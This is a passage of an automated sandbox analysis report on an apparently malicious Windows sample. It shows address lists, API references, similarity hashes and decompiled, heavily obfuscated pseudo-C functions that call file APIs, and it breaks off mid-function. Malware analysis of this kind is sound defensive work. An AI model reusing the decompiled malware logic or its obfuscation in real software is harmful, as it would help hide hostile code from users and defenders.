                                                                                                                                                                                                                                                                      0x0118d0aa
                                                                                                                                                                                                                                                                      0x0118d0c9
                                                                                                                                                                                                                                                                      0x0118d0ce
                                                                                                                                                                                                                                                                      0x0118d0ce
                                                                                                                                                                                                                                                                      0x0118d0d0
                                                                                                                                                                                                                                                                      0x0118d0d5
                                                                                                                                                                                                                                                                      0x0118d0e1
                                                                                                                                                                                                                                                                      0x0118d0d7
                                                                                                                                                                                                                                                                      0x0118d0da
                                                                                                                                                                                                                                                                      0x0118d0da
                                                                                                                                                                                                                                                                      0x0118d0e6
                                                                                                                                                                                                                                                                      0x0118d0e6
                                                                                                                                                                                                                                                                      0x0118d0ac
                                                                                                                                                                                                                                                                      0x0118d0af
                                                                                                                                                                                                                                                                      0x0118d0be
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118d0be
                                                                                                                                                                                                                                                                      0x0118d0b1
                                                                                                                                                                                                                                                                      0x0118d0b4
                                                                                                                                                                                                                                                                      0x0118d0b6
                                                                                                                                                                                                                                                                      0x0118d0b6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118d0b4
                                                                                                                                                                                                                                                                      0x0118d06d
                                                                                                                                                                                                                                                                      0x0118d070
                                                                                                                                                                                                                                                                      0x0118d086
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118d086
                                                                                                                                                                                                                                                                      0x0118d075
                                                                                                                                                                                                                                                                      0x0118d077
                                                                                                                                                                                                                                                                      0x0118d077
                                                                                                                                                                                                                                                                      0x0118d075
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118d066
                                                                                                                                                                                                                                                                      0x0118cf68
                                                                                                                                                                                                                                                                      0x0118cf76
                                                                                                                                                                                                                                                                      0x0118cf7e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118cf7e
                                                                                                                                                                                                                                                                      0x0118cf6c
                                                                                                                                                                                                                                                                      0x0118cf71
                                                                                                                                                                                                                                                                      0x0118cf71
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118cf6c
                                                                                                                                                                                                                                                                      0x0118cf29
                                                                                                                                                                                                                                                                      0x0118cf37
                                                                                                                                                                                                                                                                      0x0118cf3f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118cf3f
                                                                                                                                                                                                                                                                      0x0118cf2d
                                                                                                                                                                                                                                                                      0x0118cf32
                                                                                                                                                                                                                                                                      0x0118cf32
                                                                                                                                                                                                                                                                      0x0118cf2d

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0118CDF1,?,?,00000008,?,?,0118BFA9,00000000), ref: 0118D023
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                      • Opcode ID: cc13f65f48c959957be68704baa656ce332d34ebf21b79c0e93fde2199bd5c44
                                                                                                                                                                                                                                                                      • Instruction ID: 27e5425bc2ef80c18698aa8c6996cf47e92ad80877832b2fa7ae6e7cdfe8bf36
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc13f65f48c959957be68704baa656ce332d34ebf21b79c0e93fde2199bd5c44
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B116311106089FEB19DF28D48ABA57FA1FB45364F25C658E999CF2E1C335E982CF81
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01198570(signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				void* _v60;
                                                                                                                                                                                                                                                                      				long _v64;
                                                                                                                                                                                                                                                                      				long _v68;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v72;
                                                                                                                                                                                                                                                                      				long _v76;
                                                                                                                                                                                                                                                                      				long _v80;
                                                                                                                                                                                                                                                                      				CHAR* _v84;
                                                                                                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                                                                                                      				intOrPtr _t175;
                                                                                                                                                                                                                                                                      				intOrPtr _t213;
                                                                                                                                                                                                                                                                      				intOrPtr _t215;
                                                                                                                                                                                                                                                                      				intOrPtr _t216;
                                                                                                                                                                                                                                                                      				intOrPtr _t223;
                                                                                                                                                                                                                                                                      				signed int _t225;
                                                                                                                                                                                                                                                                      				intOrPtr _t251;
                                                                                                                                                                                                                                                                      				intOrPtr _t252;
                                                                                                                                                                                                                                                                      				intOrPtr _t255;
                                                                                                                                                                                                                                                                      				intOrPtr _t258;
                                                                                                                                                                                                                                                                      				intOrPtr _t259;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v16 = _a12 ^ 0x00000ed5;
                                                                                                                                                                                                                                                                      				_v20 = _a20 - 0x2796;
                                                                                                                                                                                                                                                                      				_v8 = _a20 ^ 0x00002796;
                                                                                                                                                                                                                                                                      				_v88 = _a12 ^ 0x00002801;
                                                                                                                                                                                                                                                                      				_v24 = _a12 - 0x269;
                                                                                                                                                                                                                                                                      				_v28 = _a20 ^ 0x000002ad;
                                                                                                                                                                                                                                                                      				_v12 = _a20 ^ 0x000001be;
                                                                                                                                                                                                                                                                      				_v56 = _a12 - 0x2801;
                                                                                                                                                                                                                                                                      				if(_v8 == (_v16 ^ 0x000003d2)) {
                                                                                                                                                                                                                                                                      					_t223 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t78 = _t223 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                                      					_v84 =  *(_a16 + 0xec) |  *_t78;
                                                                                                                                                                                                                                                                      					_v80 =  *((intOrPtr*)(_a16 + 0xd4)) + _v8;
                                                                                                                                                                                                                                                                      					_t225 =  *0x121d6a0; // 0x0
                                                                                                                                                                                                                                                                      					_v76 = _t225 * _v56 - _v12;
                                                                                                                                                                                                                                                                      					_v72 =  *((intOrPtr*)(_a16 + 0x8c)) + 0x2801;
                                                                                                                                                                                                                                                                      					_v68 = _v12 +  *((intOrPtr*)(_a16 + 0x8c)) ^ _v12;
                                                                                                                                                                                                                                                                      					_v64 =  *(_a16 + 0xe4) ^ 0x00002801;
                                                                                                                                                                                                                                                                      					_v60 = (_v28 ^ 0x0000253b) & _v8;
                                                                                                                                                                                                                                                                      					CreateFileA(_v84, _v80, _v76, _v72, _v68, _v64, _v60);
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a16 + 0x78)) = (_v24 + _v20 |  *0x01DCB1B1) +  *((intOrPtr*)(_a16 + 0x78));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a16 + 0xbadc81)) =  *((intOrPtr*)(_a16 + 0xbadc81)) - ( *(_a16 + 0xec) ^ _v24);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v52 = _v8 ^ 0x00002628;
                                                                                                                                                                                                                                                                      					_v48 = _a16;
                                                                                                                                                                                                                                                                      					_v44 = _v28 ^ 0x000003bc;
                                                                                                                                                                                                                                                                      					_v40 = _v20 + 0x2674;
                                                                                                                                                                                                                                                                      					_v36 = _v20 + 0x25a0;
                                                                                                                                                                                                                                                                      					_v32 = _v8 + 0x2801;
                                                                                                                                                                                                                                                                      					_v24 = E01195EA0(_v52, _v48, _v44, _v40, _v36, _v32);
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a16 + 0x24)) =  *((intOrPtr*)(_a16 + 0xb4)) +  *((intOrPtr*)(_a16 + 0x24)) + 0x604;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a16 + 0xbadc71)) <= 0x16f57) {
                                                                                                                                                                                                                                                                      						_t251 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t56 = _t251 + 0x24; // 0x54000
                                                                                                                                                                                                                                                                      						_t252 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t252 + 0x24)) = ( *(_a16 + 0xb0) ^  *(_a16 + 0x10)) +  *_t56 + 0x53c42;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t259 =  *0x121d6d0; // 0xfffe3a5b
                                                                                                                                                                                                                                                                      						_t175 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t49 = _t175 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                                      						_t216 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t216 + 0xe0) = _t259 + 0x000221c0 ^  *_t49;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v16 = _v16 - 0x13c;
                                                                                                                                                                                                                                                                      					if(_v16 < (_v12 ^ 0x000000cd)) {
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_a16 + 0x3c)) !=  *((intOrPtr*)(_a16 + 0xbadc71))) {
                                                                                                                                                                                                                                                                      							_t213 =  *0x121d628; // 0x1
                                                                                                                                                                                                                                                                      							_t258 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t69 = _t258 + 0x24; // 0x54000
                                                                                                                                                                                                                                                                      							_t215 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t215 + 0x24)) =  *_t69 - _t213 + 0x1725;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t255 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t71 = _t255 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a16 + 0x24)) =  *((intOrPtr*)(_a16 + 0x24)) -  *_t71 + 0x1bb7d;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v12 + 0x4c;
                                                                                                                                                                                                                                                                      			}



































                                                                                                                                                                                                                                                                      0x0119857e
                                                                                                                                                                                                                                                                      0x0119858a
                                                                                                                                                                                                                                                                      0x01198596
                                                                                                                                                                                                                                                                      0x011985a1
                                                                                                                                                                                                                                                                      0x011985ad
                                                                                                                                                                                                                                                                      0x011985b9
                                                                                                                                                                                                                                                                      0x011985c4
                                                                                                                                                                                                                                                                      0x011985d0
                                                                                                                                                                                                                                                                      0x011985df
                                                                                                                                                                                                                                                                      0x0119874a
                                                                                                                                                                                                                                                                      0x01198756
                                                                                                                                                                                                                                                                      0x01198759
                                                                                                                                                                                                                                                                      0x01198771
                                                                                                                                                                                                                                                                      0x01198774
                                                                                                                                                                                                                                                                      0x01198781
                                                                                                                                                                                                                                                                      0x01198793
                                                                                                                                                                                                                                                                      0x011987a5
                                                                                                                                                                                                                                                                      0x011987b7
                                                                                                                                                                                                                                                                      0x011987c5
                                                                                                                                                                                                                                                                      0x011987e4
                                                                                                                                                                                                                                                                      0x01198807
                                                                                                                                                                                                                                                                      0x01198835
                                                                                                                                                                                                                                                                      0x011985e5
                                                                                                                                                                                                                                                                      0x011985ed
                                                                                                                                                                                                                                                                      0x011985f3
                                                                                                                                                                                                                                                                      0x011985ff
                                                                                                                                                                                                                                                                      0x0119860a
                                                                                                                                                                                                                                                                      0x01198616
                                                                                                                                                                                                                                                                      0x01198622
                                                                                                                                                                                                                                                                      0x01198645
                                                                                                                                                                                                                                                                      0x01198661
                                                                                                                                                                                                                                                                      0x01198679
                                                                                                                                                                                                                                                                      0x011986b8
                                                                                                                                                                                                                                                                      0x011986be
                                                                                                                                                                                                                                                                      0x011986c8
                                                                                                                                                                                                                                                                      0x011986ce
                                                                                                                                                                                                                                                                      0x0119867b
                                                                                                                                                                                                                                                                      0x0119867b
                                                                                                                                                                                                                                                                      0x01198687
                                                                                                                                                                                                                                                                      0x0119868c
                                                                                                                                                                                                                                                                      0x01198692
                                                                                                                                                                                                                                                                      0x01198698
                                                                                                                                                                                                                                                                      0x01198698
                                                                                                                                                                                                                                                                      0x011986d9
                                                                                                                                                                                                                                                                      0x011986e8
                                                                                                                                                                                                                                                                      0x01198701
                                                                                                                                                                                                                                                                      0x01198703
                                                                                                                                                                                                                                                                      0x0119870f
                                                                                                                                                                                                                                                                      0x01198715
                                                                                                                                                                                                                                                                      0x0119871a
                                                                                                                                                                                                                                                                      0x01198720
                                                                                                                                                                                                                                                                      0x01198720
                                                                                                                                                                                                                                                                      0x01198723
                                                                                                                                                                                                                                                                      0x01198729
                                                                                                                                                                                                                                                                      0x0119873f
                                                                                                                                                                                                                                                                      0x0119873f
                                                                                                                                                                                                                                                                      0x01198742
                                                                                                                                                                                                                                                                      0x01198845

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 011987E4
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                                                      • Opcode ID: 134a95c703625a65e1e740468b598ae1a21a9bb7ec2b685f677bbb31b8d2b115
                                                                                                                                                                                                                                                                      • Instruction ID: 8546b4254682a9088f900068010d92f4069549b1fcf0eecd26db60d7b490fa73
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 134a95c703625a65e1e740468b598ae1a21a9bb7ec2b685f677bbb31b8d2b115
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DA1B8B4A00109DFDB08CF98E594AAEB7F2FF88304F148269E919AB345C734E951CF95
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01183450(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				long _v52;
                                                                                                                                                                                                                                                                      				CHAR* _v56;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _t100;
                                                                                                                                                                                                                                                                      				intOrPtr _t126;
                                                                                                                                                                                                                                                                      				intOrPtr _t141;
                                                                                                                                                                                                                                                                      				intOrPtr _t146;
                                                                                                                                                                                                                                                                      				intOrPtr* _t187;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = _a12 - 0x2598;
                                                                                                                                                                                                                                                                      				_v16 = _a8;
                                                                                                                                                                                                                                                                      				_v12 = _a12 + 0x1fe;
                                                                                                                                                                                                                                                                      				_v24 = _a24 + 0x8a;
                                                                                                                                                                                                                                                                      				_v20 = _a20 - 0x6b;
                                                                                                                                                                                                                                                                      				_v28 = _a4 - 0x2633;
                                                                                                                                                                                                                                                                      				if(_v20 < (_v28 ^ 0x00002622)) {
                                                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                                                      					return _v28 + 0x2687;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_v24 >= _v28 + 0x2506) {
                                                                                                                                                                                                                                                                      					if(_v28 > _v20 - 0x122) {
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_a28 + 0xbadbb1)) != ((_v8 | 0x00002674) ^ _v12)) {
                                                                                                                                                                                                                                                                      							_v12 = _v12 - ((_v8 |  *(_a28 + 0x8c)) ^ 0x00002598);
                                                                                                                                                                                                                                                                      							_v8 = ( *(_a28 + 0x30) |  *(_a28 + 0x3c)) ^ _v8;
                                                                                                                                                                                                                                                                      							_t146 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t63 = _t146 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                                      							 *0x121d668 =  *_t63 * 0x00002633 ^ 0x00002628 ^  *0x121d668;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v8 = _v8 + 0x2796;
                                                                                                                                                                                                                                                                      						_v12 = _v12 - 0x16e;
                                                                                                                                                                                                                                                                      						_v8 = _v8 - 0x1fe;
                                                                                                                                                                                                                                                                      						_v8 = _v8 + 0x14d;
                                                                                                                                                                                                                                                                      						_v16 = _v16 + 0x74;
                                                                                                                                                                                                                                                                      						_v48 = _v16 ^ 0x00000308;
                                                                                                                                                                                                                                                                      						_v44 = _v16 + 0x25b;
                                                                                                                                                                                                                                                                      						_v40 = 0x121d5f0;
                                                                                                                                                                                                                                                                      						_v36 = _v16 + 0xe7;
                                                                                                                                                                                                                                                                      						_v32 = _v28 + 0x2801;
                                                                                                                                                                                                                                                                      						_v16 = E01183D10(_v48, _v44, _v40, _v36, _v32);
                                                                                                                                                                                                                                                                      						_t187 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t126 =  *0x121d650; // 0xb67e4e55
                                                                                                                                                                                                                                                                      						 *0x121d650 = _t126 -  *_t187;
                                                                                                                                                                                                                                                                      						_v12 = _v12 ^ 0x0000001b;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_v20 > (_v24 ^ 0x00000347)) {
                                                                                                                                                                                                                                                                      					if(_v8 > _v20) {
                                                                                                                                                                                                                                                                      						_t100 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						if(_v8 != ( *((intOrPtr*)(_t100 + 0xbadc71)) -  *0x121d6a0 & _v24)) {
                                                                                                                                                                                                                                                                      							_v60 = _v24 +  *0x121d628 ^ 0x00002796;
                                                                                                                                                                                                                                                                      							_v56 = _v20 ^  *(_a28 + 0xe4) ^ 0x00002506;
                                                                                                                                                                                                                                                                      							_v52 = _v24 +  *((intOrPtr*)(_a28 + 0x78));
                                                                                                                                                                                                                                                                      							GetModuleFileNameA(_v60, _v56, _v52);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v8 = _v8 + 0xb1;
                                                                                                                                                                                                                                                                      						_t141 =  *0x121d690; // 0xab88ba4e
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a28 + 0x98)) = _t141;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                                                      0x0118345e
                                                                                                                                                                                                                                                                      0x01183464
                                                                                                                                                                                                                                                                      0x01183470
                                                                                                                                                                                                                                                                      0x0118347b
                                                                                                                                                                                                                                                                      0x01183484
                                                                                                                                                                                                                                                                      0x01183490
                                                                                                                                                                                                                                                                      0x0118349e
                                                                                                                                                                                                                                                                      0x0118367f
                                                                                                                                                                                                                                                                      0x0118368a
                                                                                                                                                                                                                                                                      0x0118368a
                                                                                                                                                                                                                                                                      0x011834b0
                                                                                                                                                                                                                                                                      0x011834c2
                                                                                                                                                                                                                                                                      0x0118358b
                                                                                                                                                                                                                                                                      0x011835a3
                                                                                                                                                                                                                                                                      0x011835be
                                                                                                                                                                                                                                                                      0x011835c1
                                                                                                                                                                                                                                                                      0x011835c7
                                                                                                                                                                                                                                                                      0x011835dd
                                                                                                                                                                                                                                                                      0x011835dd
                                                                                                                                                                                                                                                                      0x011834c8
                                                                                                                                                                                                                                                                      0x011834d0
                                                                                                                                                                                                                                                                      0x011834dc
                                                                                                                                                                                                                                                                      0x011834e8
                                                                                                                                                                                                                                                                      0x011834f3
                                                                                                                                                                                                                                                                      0x011834fc
                                                                                                                                                                                                                                                                      0x01183508
                                                                                                                                                                                                                                                                      0x01183513
                                                                                                                                                                                                                                                                      0x01183516
                                                                                                                                                                                                                                                                      0x01183526
                                                                                                                                                                                                                                                                      0x01183532
                                                                                                                                                                                                                                                                      0x01183551
                                                                                                                                                                                                                                                                      0x01183554
                                                                                                                                                                                                                                                                      0x0118355a
                                                                                                                                                                                                                                                                      0x01183561
                                                                                                                                                                                                                                                                      0x0118356c
                                                                                                                                                                                                                                                                      0x0118356c
                                                                                                                                                                                                                                                                      0x011834c2
                                                                                                                                                                                                                                                                      0x011835ee
                                                                                                                                                                                                                                                                      0x011835fa
                                                                                                                                                                                                                                                                      0x01183620
                                                                                                                                                                                                                                                                      0x01183638
                                                                                                                                                                                                                                                                      0x01183649
                                                                                                                                                                                                                                                                      0x0118365e
                                                                                                                                                                                                                                                                      0x0118366a
                                                                                                                                                                                                                                                                      0x01183679
                                                                                                                                                                                                                                                                      0x01183679
                                                                                                                                                                                                                                                                      0x011835fc
                                                                                                                                                                                                                                                                      0x01183605
                                                                                                                                                                                                                                                                      0x0118360b
                                                                                                                                                                                                                                                                      0x01183611
                                                                                                                                                                                                                                                                      0x01183611
                                                                                                                                                                                                                                                                      0x011835fa
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,?), ref: 01183679
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                                                                                                                                      • Opcode ID: c4e0f2d59b233817fddb4af996d2211acbd9dd1aec5d82d8e5acb745c9130d64
                                                                                                                                                                                                                                                                      • Instruction ID: 8ccf578bfa5aedce186d186878d7ccad082afb6ac13797c19bd9cd5ab34f7e69
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4e0f2d59b233817fddb4af996d2211acbd9dd1aec5d82d8e5acb745c9130d64
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF71C570D00109DFDB08DF98D994AAEBBF2FF88304F648669D519AB349D734AA41CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01195EA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA* _v32;
                                                                                                                                                                                                                                                                      				CHAR* _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                                                                                                                                      				signed int _t85;
                                                                                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v24 = _a24 - 0x2801;
                                                                                                                                                                                                                                                                      				_v20 = _a16 - 0x139;
                                                                                                                                                                                                                                                                      				_v28 = _a12 - 0x2687;
                                                                                                                                                                                                                                                                      				_v16 = _a16;
                                                                                                                                                                                                                                                                      				_v8 = _a12 + 0x132;
                                                                                                                                                                                                                                                                      				_v40 = _a4 + 0x212;
                                                                                                                                                                                                                                                                      				if(_v8 != _v16 + 0x18d) {
                                                                                                                                                                                                                                                                      					_t93 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t18 = _t93 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a8 + 0xb8)) >  *_t18) {
                                                                                                                                                                                                                                                                      						_t75 =  *0x121d628; // 0x1
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a8 + 0x24)) = _t75 + 0x324;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v8 = _v8 - 0x186;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_v16 != _v20 + 0x199) {
                                                                                                                                                                                                                                                                      					if(_v20 == _v24 + 0x2687) {
                                                                                                                                                                                                                                                                      						_v12 =  *((intOrPtr*)(_a8 + 0x8c));
                                                                                                                                                                                                                                                                      						while(_v12 >= ( *0x0121D604 & 0x000026d4)) {
                                                                                                                                                                                                                                                                      							_t85 =  *0x121d68c; // 0x14b95e
                                                                                                                                                                                                                                                                      							_v36 = (_t85 ^ 0x00002633) -  *((intOrPtr*)(_a8 + 0xf4));
                                                                                                                                                                                                                                                                      							_t65 =  *0x121d62c; // 0x161485
                                                                                                                                                                                                                                                                      							_v32 = _t65 + _v16 + _v28;
                                                                                                                                                                                                                                                                      							FindFirstFileA(_v36, _v32);
                                                                                                                                                                                                                                                                      							_v12 = _v12 + 3;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
